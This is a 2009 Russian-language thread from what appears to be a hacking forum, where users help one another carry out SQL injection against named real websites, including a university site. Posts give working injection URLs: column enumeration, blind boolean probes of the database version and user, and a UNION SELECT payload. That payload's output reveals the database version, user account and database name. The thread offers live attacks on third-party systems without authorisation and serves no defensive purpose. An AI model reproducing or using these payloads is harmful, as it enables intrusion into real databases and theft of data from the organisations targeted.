14.02.2009, 02:04
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Код:
www.christuniversity.in/secmenudisp.php?MID=37+group+by+1+--
Один столбец |
|
|
14.02.2009, 02:06
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
ой .... не пинайте  |
|
|
|
14.02.2009, 02:11
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
А почему при простом запросе union+select+1+-- пишеть што : The used SELECT statements have a different number of columns когда я точно узнал што чеголиш 1 столбец
Последний раз редактировалось Saiga; 14.02.2009 в 02:24..
|
|
|
|
14.02.2009, 02:29
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
видемо мне ....
2 pinky07 незнаю как далше .
|
|
|
|
14.02.2009, 02:33
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Saiga, заканчивай флудить и кидай ссылку.
p.s. терпения не хватило подобрать количество столбцов, в таких случаях можно использовать подзапросы
http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4
версия Mysql =4
юзер бд:
http://www.christuniversity.in/secmenudisp.php?MID=7+and+ascii(substring(user(),1 ,1))=99 -- c
итд....
// прочитай побольше статей
Последний раз редактировалось pinky07; 14.02.2009 в 03:02..
|
|
|
|
14.02.2009, 02:39
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
hh~tp://www.christuniversity.in/secmenudisp.php?MID=7
|
|
|
|
14.02.2009, 02:55
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
http://www.christuniversity.in/secmenudisp.php?MID=7+and+substring(version(),1,1) =4
ИТД...
|
|
|
|
14.02.2009, 09:29
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
pinky07, зачем усложнять жизнь подзапросами??? это крайняя мера, так как долго и нудно! Этот сайт вообще одна большая скуль =))) каждый параметр и стоило еще чуть посмотреть и вот он
Код:
http://www.christuniversity.in/display_article.php?fid=20&arid=13+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/*
4.1.22
christco_christ@localhost
christ_university
Последний раз редактировалось Kraneg; 14.02.2009 в 09:40..
|
|
|
|
14.02.2009, 12:34
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
|
|
|
|
14.02.2009, 12:37
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от BanQui
Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
Код:
SELECT post_id,title,date FROM eA_cp.mainnews ORDER by date DESC LIMIT -5,5
Инъекция в limit после order by.
ничего не сделаешь тут.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
